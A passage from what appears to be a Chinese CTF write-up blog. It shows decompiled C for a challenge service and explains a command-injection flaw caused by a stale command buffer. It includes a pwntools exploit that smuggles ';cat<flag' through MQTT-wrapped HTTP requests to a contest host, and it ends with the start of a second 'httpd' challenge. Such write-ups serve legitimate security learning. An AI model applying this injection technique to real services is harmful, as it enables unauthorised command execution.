class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="sc">&#39;/&#39;</span> <span class="o">||</span> <span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="sc">&#39;.&#39;</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="sc">&#39;_&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">snprintf</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="mh">0x80u</span><span class="p">,</span> <span class="s">&#34;cat /home/ctf/%s&#34;</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="nf">strlen</span><span class="p">(</span><span class="n">src</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">src</span><span class="p">,</span> <span class="n">v7</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="s">&#34;index_html&#34;</span><span class="p">)</span> <span class="p">)</span> <span class="c1">// is index_html </span></span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v5</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">stream</span> <span class="o">=</span> <span class="nf">popen</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="s">&#34;r&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">stream</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="nf">fgets</span><span class="p">(</span><span class="n">v50</span><span class="p">,</span> <span class="mi">255</span><span class="p">,</span> <span class="n">stream</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v50</span><span class="p">[</span><span class="nf">strcspn</span><span class="p">(</span><span class="n">v50</span><span class="p">,</span> <span class="s">&#34;</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">)]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v50</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">msgsend</span><span class="p">(</span><span class="n">v50</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">(</span><span class="n">v50</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x100u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">pclose</span><span class="p">(</span><span class="n">stream</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">msgsend</span><span class="p">(</span><span class="s">&#34;403&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;fault2&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;fault&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;404&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>协议的格式就是正常 http 协议的格式</p> <p>注意这一段:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="n">i</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">&gt;=</span> <span class="nf">strlen</span><span class="p">(</span><span class="n">s</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="sc">&#39;/&#39;</span> <span class="o">||</span> <span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="sc">&#39;.&#39;</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="sc">&#39;_&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">snprintf</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="mh">0x80u</span><span class="p">,</span> <span class="s">&#34;cat /home/ctf/%s&#34;</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="nf">strlen</span><span class="p">(</span><span class="n">src</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">src</span><span class="p">,</span> <span class="n">v7</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="s">&#34;index_html&#34;</span><span class="p">)</span> <span class="p">)</span> <span class="c1">// is index_html </span></span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v5</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">stream</span> <span class="o">=</span> <span class="nf">popen</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="s">&#34;r&#34;</span><span class="p">);</span> </span></span></code></pre></td></tr></table> </div> </div><p>src 中只能是 index_html 的格式,但发现校验的对象是 src ,而被执行的是 cmd ,且 cmd 在校验前已经赋值好,在校验失败后会残留,所以我们可以利用 shell 中 &lsquo;;&rsquo; 的作用完成漏洞的利用</p> <h3 id="攻击思路-2">攻击思路 </h3><p>第一次发送 <code>GET /home/ctf/index_html;cat&lt;flag</code> , cmd 变为 <code>cat /home/ctf/index_html;cat&lt;flag</code> ,校验不通过</p> <p>第二次发送 <code>GET /home/ctf/index_html</code> , 前段被覆盖后 cmd 还是 <code>cat /home/ctf/index_html;cat&lt;flag</code> ,且校验通过, popen 执行 <code>cat /home/ctf/index_html;cat&lt;flag</code> ,成功获取到 flag</p> <h3 id="exp-2">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">threading</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">os</span> <span class="o">=</span> <span class="s1">&#39;linux&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">file</span> <span class="o">=</span> <span class="s1">&#39;./pwn&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">target</span> <span class="o">=</span> <span class="s1">&#39;nc1.ctfplus.cn&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">port</span> <span class="o">=</span> <span class="mi">41317</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">encode_varint</span><span class="p">(</span><span class="n">n</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">res</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="n">n</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">byte</span> <span class="o">=</span> <span class="n">n</span> <span class="o">&amp;</span> <span class="mh">0x7f</span> </span></span><span class="line"><span class="cl"> <span class="n">n</span> <span class="o">&gt;&gt;=</span> <span class="mi">7</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">n</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">byte</span> <span class="o">|=</span> <span class="mh">0x80</span> </span></span><span class="line"><span class="cl"> <span class="n">res</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">([</span><span class="n">byte</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">res</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">mqtt_connect</span><span class="p">(</span><span class="n">client_id</span><span class="o">=</span><span class="sa">b</span><span class="s2">&#34;hacker&#34;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x00\x04</span><span class="s2">MQTT</span><span class="se">\x04\x02\x00\x3c</span><span class="s2">&#34;</span> <span class="o">+</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&gt;H&#34;</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">client_id</span><span class="p">))</span> <span class="o">+</span> <span class="n">client_id</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x10</span><span class="s2">&#34;</span> <span class="o">+</span> <span class="n">encode_varint</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span> <span class="o">+</span> <span class="n">payload</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">mqtt_publish</span><span class="p">(</span><span class="n">topic</span><span class="p">,</span> <span class="n">msg</span><span class="p">,</span> <span class="n">retain</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">flags</span> <span class="o">=</span> <span class="mh">0x31</span> <span class="k">if</span> <span class="n">retain</span> <span class="k">else</span> <span class="mh">0x30</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&gt;H&#34;</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">topic</span><span class="p">))</span> <span class="o">+</span> <span class="n">topic</span> <span class="o">+</span> <span class="n">msg</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nb">bytes</span><span class="p">([</span><span class="n">flags</span><span class="p">])</span> <span class="o">+</span> <span class="n">encode_varint</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span> <span class="o">+</span> <span class="n">payload</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">mqtt_subscribe</span><span class="p">(</span><span class="n">topic</span><span class="p">,</span> <span class="n">pkt_id</span><span class="o">=</span><span class="mi">1</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&gt;H&#34;</span><span class="p">,</span> <span class="n">pkt_id</span><span class="p">)</span> <span class="o">+</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&gt;H&#34;</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">topic</span><span class="p">))</span> <span class="o">+</span> <span class="n">topic</span> <span class="o">+</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x00</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x82</span><span class="s2">&#34;</span> <span class="o">+</span> <span class="n">encode_varint</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span> <span class="o">+</span> <span class="n">payload</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;127.0.0.1&#39;</span><span class="p">,</span> <span class="mi">9998</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span> <span class="o">=</span> <span class="n">p</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">dbg</span><span class="p">(</span><span class="n">cmd</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">gdbscript</span> <span class="o">=</span> <span class="n">cmd</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">peek</span><span class="p">(</span><span class="n">num</span><span class="o">=</span><span class="mi">4096</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">message</span> <span class="o">=</span> <span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span><span class="o">.</span><span class="n">unrecv</span><span class="p">(</span><span class="n">message</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">message</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sa</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">ur</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">unrecv</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">pk</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">peek</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">rl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">ru</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">itr</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">uu32</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u32</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uu64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u64</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uru64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">uu64</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="s1">&#39;</span><span class="se">\x7f</span><span class="s1">&#39;</span><span class="p">)[</span><span class="o">-</span><span class="mi">6</span><span class="p">:])</span> </span></span><span class="line"><span class="cl"><span class="n">leak</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">name</span> <span class="p">:</span><span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="s1">&#39;</span><span class="si">{}</span><span class="s1"> = </span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">eval</span><span class="p">(</span><span class="n">name</span><span class="p">))))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">attack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span><span class="p">(</span><span class="n">mqtt_connect</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span><span class="p">(</span><span class="n">mqtt_subscribe</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;HTTP&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;GET /home/ctf/index_html;cat&lt;flag&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span><span class="p">(</span><span class="n">mqtt_publish</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;HTTP&#39;</span><span class="p">,</span> <span class="n">payload</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;GET /home/ctf/index_html HTTP/1.1</span><span class="se">\r\n</span><span class="s1">Host: x</span><span class="se">\r\n</span><span class="s1">ContentLength: 10</span><span class="se">\r\n</span><span class="s1">&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span><span class="p">(</span><span class="n">mqtt_publish</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;HTTP&#39;</span><span class="p">,</span> <span class="n">payload</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">itr</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">attack</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="httpd">httpd </h2><p>第一次做 httpd</p> <p>还是难在逆向,,,</p> <h3 id="checksec-1">checksec </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[*] &#39;/home/RatherHard/CTF-pwn/PolarisCTF/httpd/httpd&#39; </span></span><span class="line"><span class="cl"> Arch: amd64-64-little </span></span><span class="line"><span class="cl"> RELRO: Partial RELRO </span></span><span class="line"><span class="cl"> Stack: Canary found </span></span><span class="line"><span class="cl"> NX: NX enabled </span></span><span class="line"><span class="cl"> PIE: No PIE (0x400000) </span></span><span class="line"><span class="cl"> SHSTK: Enabled </span></span><span class="line"><span class="cl"> IBT: Enabled </span></span></code></pre></td></tr></table> </div> </div><p>好久没见过 no pie 的题目了</p> <h3 id="ida-2">IDA </h3><h4 id="main-1">main </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="n">__noreturn</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a2</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a3</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">optval</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-D4h] BYREF 